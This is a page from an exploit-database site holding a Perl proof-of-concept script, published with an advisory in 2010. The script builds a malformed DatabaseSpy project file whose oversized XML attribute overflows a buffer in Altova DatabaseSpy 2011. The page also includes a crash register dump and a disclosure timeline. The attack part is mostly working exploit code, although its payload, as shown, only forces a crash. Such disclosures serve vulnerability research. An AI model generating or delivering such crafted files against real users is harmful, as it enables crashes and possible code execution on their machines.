0day.today - Biggest Exploit Database in the World.
![](/img/logo_green.jpg)
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earnGOLD
Administration of this site uses the official contacts. Beware of impostors!
![We DO NOT use Telegram or any messengers / social networks!](/img/no_telegram_big.png)
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Altova DatabaseSpy 2011 Project File Handling Buffer Overflow
============================================================= Altova DatabaseSpy 2011 Project File Handling Buffer Overflow ============================================================= #!/usr/bin/perl # # # Title: Altova DatabaseSpy 2011 Project File Handling Buffer Overflow Vulnerability # # # Vendor: Altova GmbH # Product web page: http://www.altova.com # Affected version: Enterprise Edition 2011 # # # Summary: Altova DatabaseSpy® 2011 is the unique multi-database query, design, # and database comparison tool. It connects to all major databases, easing SQL # editing, database structure design, database content editing, database schema # and content comparison, and database conversion for a fraction of the cost of # single-database solutions. # # # Desc: The Altova DatabaseSpy 2011 Enterprise Edition suffers from a buffer # overflow/memory corruption vulnerability when handling project files (.qprj). # The issue is triggered because there is no boundry checking of some XML tag # property values, ex: <Folder FolderName="SQL" Type="AAAAAAA..../>" (~1000 bytes). # This can aid the attacker to execute arbitrary machine code in the context of an # affected node (locally and remotely) via file crafting or computer-based social # engineering. # # # Tested on: Microsoft Windows XP Professional SP3 (English) # # #----------------------------------------------------------------------------------# # # (342c.37c0): Access violation - code c0000005 (first chance) # First chance exceptions are reported before any exception handling. # This exception may be expected and handled. # eax=04430041 ebx=0203ff98 ecx=0443deda edx=56413f2e esi=0022dd98 edi=00000016 # eip=00420b83 esp=0022dc00 ebp=00000017 iopl=0 nv up ei pl nz na po nc # cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010202 # *** ERROR: Symbol file could not be found. Defaulted to export symbols for # DatabaseSpy.exe - DatabaseSpy+0x20b83: # 00420b83 663b02 cmp ax,word ptr [edx] ds:0023:56413f2e=???? # #----------------------------------------------------------------------------------# # # # Vulnerability discovered by: Gjoko 'LiquidWorm' Krstic # liquidworm gmail com # Zero Science Lab - http://www.zeroscience.mk # # # Vendor status: [17.10.2010] Vulnerability discovered. # [17.10.2010] Initial contact with the vendor with sent PoC files. # [21.10.2010] No reply from vendor. # [22.10.2010] Public advisory released. # # # Advisory ID: ZSL-2010-4971 # Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2010-4971.php # Advisory TXT: http://www.zeroscience.mk/codes/dbspy_bof.txt # # # 17.10.2010 # use strict; system cls; sub header() { print " @=---===---===---===---===---===---===---===---=@ | | | Proof Of Concept PERL script for | | | | Altova DatabaseSpy 2011 (Enteprise Edition) | | | | | | | | | | --- | | | | Copyleft (c) 2010 | | | | Zero Science Lab - http://www.zeroscience.mk | | | @=---===---===---===---===---===---===---===---=@ \n\n"; } my $FILENAME = "DEATH_FROM_ABOVE.qprj"; #DatabaseSpy Project File my $PAYLOAD = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". #48 "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"; #1008B #21 my $PROJECT = "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\xA<!-". "- DatabaseSpy Project File -->\xA<Project Vers". "ion=\"2\" Expanded=\"Yes\" Type=\"Root\" Title=". "\"test\">\xA\x9<Folder FolderName=\"Data Sources". "\" Type=\"DataSourceFolder\"/>\xA\x9<Folder Fol". "derName=\"SQL\" Type=\"SQLRootFolder\" database". "_kind=\"Unknown\" datasource=\"Offline\" descrip". "tion=\"Store and organize SQL files for this pro". "ject.\" blockingstrategy=\"semi\"/>\xA\x9<Folder". " FolderName=\"Design\" Type=\"$PAYLOAD\" databas". "e_kind=\"Unknown\" datasource=\"Offline\" descri". "ption=\"I LOVE VERONICA CORNINGSTONE.\"/>\xA\x9<". "Folder FolderName=\"Data Diff\" Type=\"DataDiffR". "ootFolder\"/>\xA\x9<Folder FolderName=\"Schema D". "iff\" Type=\"Schema DiffRootFolder\"/>\xA\x9<Fol". "der FolderName=\"Favorites\" Type=\"FavoriteFold". "er\"/>\xA</Project>\xA"; sub code() { system ("color 3"); #~!@#$%^&*()_+|<>?:"{}=-`';/.,0 open qprj, ">./$FILENAME" || die "\nCan't open #$_@ $FILENAME: $!"; print "\n (1) "; system("pause"); # print qprj $PROJECT; print "\n (2) Buffering mali". "cious format file . . .\r\n"; sleep 2; close qprj; print "\n (3) File $FILENAME created successfully". "!\n"; sleep 2; system ("color \x44"); sleep 1; #.% print "\n (4) And the color is changed.\n"; } print "\n"; header(); code(); #EOF # 0day.today [2024-07-05] #